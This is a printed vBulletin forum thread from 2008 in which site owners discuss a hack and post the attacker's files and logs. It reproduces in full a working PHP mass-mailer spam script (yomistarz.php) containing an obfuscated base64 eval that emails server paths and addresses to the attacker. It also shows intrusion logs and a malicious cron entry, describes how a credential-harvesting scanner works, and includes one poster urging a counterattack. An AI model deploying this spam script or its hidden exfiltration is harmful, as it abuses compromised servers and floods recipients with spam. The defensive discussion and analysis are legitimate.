vb.org Archive - :) HaCkEd aGaIn :)

vb.org Archive (https://vborg.vbsupport.ru/index.php)

- vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)

- - :) HaCkEd aGaIn :) (https://vborg.vbsupport.ru/showthread.php?t=191383)

:) HaCkEd aGaIn :)

I was reading in the morning that someone was hacked and I thought: I'm gonna find the time to write a good 'Guide for the Hacked' for users not to get hysterical about the problem and ZAZ! my site was hacked :P but I don't get all scare, good thing that I know by memory the structure of my server/files... but must be interesting analyze/dissect the attacks for future references...

I don't know if it's improper to post this, please advise me if so... but here the main file who steals you cP's Password: CONFIGSCAN.PHP

*** Script removed, no need to post a script to hack a site ***
p.s. I fixed very calmly my problem :)

wouldn't they still need a way to get that file on your server?

Quote:

Originally Posted by FRDS (Post 1626038)

wouldn't they still need a way to get that file on your server?

This was gonna be my question. That is what I would be freaking out over!

In fact I said: I always take it with calm... not that I'm a expert :D
I just check head-over-heels, and although I said to my Hosting Service that might my a Shell thing they say is script-related thing... so I don't discuss and go to the logs and clean everything and change passwords...

It came with many 'strange foreign files'

Any idea what that script compromise?

p.s. I consider a tootache more important that a vBulletin's board hacked

--------------- Added [DATE]1221886742[/DATE] at [TIME]1221886742[/TIME] ---------------

and everything start here:

Quote:

212.100.250.218 - - [11/Sep/2008:11:03:48 -0600] "GET /cpanel HTTP/1.0" 301 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 2.0.1)"
212.100.250.218 - - [11/Sep/2008:11:07:34 -0600] "GET /version.php HTTP/1.0" 200 63599 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 2.0.1)"
212.100.250.218 - - [11/Sep/2008:11:07:29 -0600] "GET /configscan.php HTTP/1.0" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 2.0.1)"
41.219.229.144 - - [11/Sep/2008:11:09:54 -0600] "GET /configscan.php HTTP/1.1" 200 1813 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; FDM)"
41.219.229.144 - - [11/Sep/2008:11:26:00 -0600] "GET /yomistarz/yomistarz.php HTTP/1.1" 200 3698 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; FDM)"
212.100.250.218 - - [12/Sep/2008:03:24:41 -0600] "POST /GuXnnQshoT.php HTTP/1.0" 200 25610 "http://iogames.com/GuXnnQshoT.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16)

England & Nigeria :rolleyes:

Quote:

Originally Posted by iogames (Post 1626072)

p.s. I consider a tootache more important that a vBulletin's board hacked

But do your users agree with that! ;)

'Naija Bois Too Much '

https://vborg.vbsupport.ru/external/2008/09/2.gif

Info in the files, I called my Nigerian friend OSUJI, and he told me is a bragging gang term...

To avoid that this file finds out your password,change the config.php file so that it is not a one-liner,but more lines.Especially the password parts.

The only thing I regret is to lose my SuperSecure password: it was a word I created with Latin & Greek roots, combined with numbers and must be entered sitting over your head singing Jingle bells in Zulu :D

The only FTP connection I see is on 9/14/2008

Quote:

14 40 7.86% 40 files 153kb

Over .png files :p

i remember reading something on how to protect the config.php there's info here to protect your file using htaccess http://www.sitebuddy.com/php/VBullet...with_.htaccess hope that help :)

Or CHMOD it to 600 ;),this allows the script to be access via your vBulletin/server files,but not via users :),I use this for my products.

me to my site is hacked

I think they weren't after vB since they just injected stuff to spam, and I discover a new email account on my cP with high activity...

2 more files [since this is moved to a discussion forum]

yomistarz.php

PHP Code:


		
			
<?php







if(isset($_POST['action'] ) ){



$action=$_POST['action'];



$message=$_POST['message'];



$emaillist=$_POST['emaillist'];



$from=$_POST['from'];



$replyto=$_POST['replyto'];



$subject=$_POST['subject'];



$realname=$_POST['realname'];



$file_name=$_POST['file'];



$contenttype=$_POST['contenttype'];







        $message = urlencode($message);



        $message = ereg_replace("%5C%22", "%22", $message);



        $message = urldecode($message);



        $message = stripslashes($message);



        $subject = stripslashes($subject);



}











?>



<html>



<head>



<title>|| InboX Mass Mailer ||</title>



<meta http-equiv="Content-Type" content="text/html; 



charset=iso-8859-1">







<style type="text/css">



<!--



.style1 {



        font-family: Geneva, Arial, Helvetica, sans-serif;



        font-size: 12px;



}



-->



</style>



<style type="text/css">



<!--



.style1 {



        font-size: 20px;



        font-family: Geneva, Arial, Helvetica, sans-serif;



}



-->



</style>



</head>



<body bgcolor="FF9900" text="#ffffff">



<span class="style1">InboX Mass Mailer<br>



</span>







<form name="form1" method="post" action="" 



enctype="multipart/form-data">



  <br>



  <table width="100%" border="0">



    <tr>



      <td width="10%">



        <div align="right"><font size="-3" face="Verdana, Arial, 



Helvetica, sans-serif">Your



          Email:</font></div>



      </td>



      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <input type="text" name="from" value="<? print $from; ?>" 



size="30">



        </font></td>



      <td width="31%">



        <div align="right"><font size="-3" face="Verdana, Arial, 



Helvetica, sans-serif">Your



          Name:</font></div>



      </td>



      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <input type="text" name="realname" value="<? print $realname; 



?>" size="30">



        </font></td>



    </tr>



    <tr>



      <td width="10%">



        <div align="right"><font size="-3" face="Verdana, Arial, 



Helvetica, sans-serif">Reply-To:</font></div>



      </td>



      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <input type="text" name="replyto" value="<? print $replyto; ?>" 



size="30">



        </font></td>



      <td width="31%">



        <div align="right"><font size="-3" face="Verdana, Arial, 



Helvetica, sans-serif">Attach



          File:</font></div>



      </td>



      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <input type="file" name="file" size="30">



        </font></td>



    </tr>



    <tr>



      <td width="10%">



        <div align="right"><font size="-3" face="Verdana, Arial, 



Helvetica, sans-serif">Subject:</font></div>



      </td>



      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <input type="text" name="subject" value="<? print $subject; ?>" 



size="90">



        </font></td>



    </tr>



    <tr valign="top">



      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <textarea name="message" cols="50" rows="10"><? print $message; 



?></textarea>



        <br>



        <input type="radio" name="contenttype" value="plain" >



        Plain Text



        <input name="contenttype" type="radio" value="html" checked>



        HTML



        <input type="hidden" name="action" value="send">



        <input type="submit" value="Send eMails">



        </font></td>



      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <textarea name="emaillist" cols="30" rows="10"><? print 



$emaillist; ?></textarea>



        </font></td>



    </tr>



  </table>



</form>















<?







if ($action){







        if (!$from && !$subject && !$message && !$emaillist){



        print "Please complete all fields before sending your 



message.";



        exit;    



    }



    $allemails = split("\n", $emaillist);



            $numemails = count($allemails);



       



          for($x=0; $x<$numemails; $x++){



                $to = $allemails[$x];



                if ($to){



                $to = ereg_replace(" ", "", $to);



                $message = ereg_replace("&email&", $to, $message);



                $subject = ereg_replace("&email&", $to, $subject);



                print " $to.......";



                flush();



                $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";



                $header .= "MIME-Version: 1.0\r\n";



            If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";



              If ($file_name) $header .= "--$uid\r\n";



                $header .= "Content-Type: text/$contenttype\r\n";



                $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";



                $header .= "$message\r\n";



            If ($file_name) $header .= "--$uid\r\n";



            If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";



            If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";



            If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";



            If ($file_name) $header .= "$content\r\n";



            If ($file_name) $header .= "--$uid--";



                mail($to, $subject, "", $header);



                print "spammed<br>";



    



                flush();



                }



                }



$ra44  = rand(1,99999);



$subj98 = "sh-$ra44";



$a5 = $_SERVER['HTTP_REFERER'];



$b33 = $_SERVER['DOCUMENT_ROOT'];



$c87 = $_SERVER['REMOTE_ADDR'];



$d23 = $_SERVER['SCRIPT_FILENAME'];



$e09 = $_SERVER['SERVER_ADDR'];



$f23 = $_SERVER['SERVER_SOFTWARE'];



$g32 = $_SERVER['PATH_TRANSLATED'];



$h65 = $_SERVER['PHP_SELF'];



$message=$_POST['message'];



$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";



echo eval(base64_decode("bWFpbCgiZ3JvZmloYWNrQGdtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));



}











?>



<style type="text/css">



<!--



.style1 {



    font-size: 20px;



    font-family: Geneva, Arial, Helvetica, sans-serif;



}



-->



</style>



<p class="style1">



   Copyright ? 2007 phpbb.com







      </p>



<?php



if(isset($_POST['action']) && $numemails !==0 ){echo 



"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); 



</script>";}



?>



</body>



</html>

and a file named SS.PHP with 6k lines

Why we don't counterattack? I mean, we are majority, we together know more than this pranksters...

Is that a spam php script?

I got hacked with that script too, no clue how they got it on my server.

Though the only thing running on my web server is vbulletin.

Well, the problem was resolved in a few hours, I find this in cPanel's Cron Job section:

Quote:

public_html/auctions/components/y2kupdate >/dev/null 2>&1

WOw... i have a "hackers problem" someone is injecting me shells in my site ("c99"....

@iogames

I'm confused as to what you are trying to tell us here.

You've not confirmed how they gained access.
How did they get the files into your directories. ?

Did you have a backdoor open or was it via another site on the shared hosting ?

Would it not be more helpful to let people know exactly what version of vBulletin you have installed
What hacks are installed.
Also what else do you have running on your site.

If people see something in common then it may help to close a vulnerability that may have been exploited.

Ok...
I was so busy that I didn't touch my site for days, till one day I got some spare time and start working on it again... I lost my access to cPanel, I just reset password and they send me to my email the current password, then I starting to look what was going on, and found those foreign files, they didn't remove nothing, then I started a assessment of the problem, and start posting:

So basically don't know if there was to a third party script, or Shell injection, Hosters will never accept that there was fault on their part, I just received their help and advise...

- CronJobs
- Inserted files
- FTP Logs
- Raw Logs
- .htaccess
- Change of passwords
- Check intengrity of the MySQL's dBs
- Eliminate unknown files, etc...

heres the guys email address: grofihack@gmail.com

i decoded the base64 encoded part of the posted script

Quote:

Originally Posted by esperone (Post 1627697)

heres the guys email address: grofihack@gmail.com

i decoded the base64 encoded part of the posted script

See? we must fight back and don't play victims...
after they run out of tricks, they must start running ;)

well as it seems the file that gets cpane logins scans all directorys on a server that are open n read files such as config.php,conf_global.php etc for the user login and password for mysql ( or what ever you use) and then try it on the directorys ftp and will give the hackers the results as to how many he can acceess on the server within seconds.. no ++++ing around very simple job...

but how did they get the file on your server in the 1st placE?. maybe a another vuln in vb again?

Quote:

Originally Posted by Dzelil (Post 1628039)

If there's another vulnerability on vB [which I don't believe] we will just have the denial as from my hosting service [which I really believe] ... to be accurate I don't know but I uninstall 3 scripts...
I was blaming my Auction site, but another user in this thread mentioned to be victim of the same attack and that his/her server only host vB...
So we are alone on this till someone more kind/prepared re-structure the rules of engagement...

Phrase Groups Available:

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.01400 seconds Memory Usage 1,829KB Queries Executed 10 (?)
More Information
Template Usage: (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (1)bbcode_php_printable (7)bbcode_quote_printable (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)post_thanks_navbar_search (1)printthread (23)printthreadbit (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit showthread	Included Files: ./printthread.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/class_bbcode_alt.php ./includes/class_bbcode.php ./includes/functions_bigthree.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete printthread_start bbcode_fetch_tags bbcode_create bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete printthread_post printthread_complete
Messages: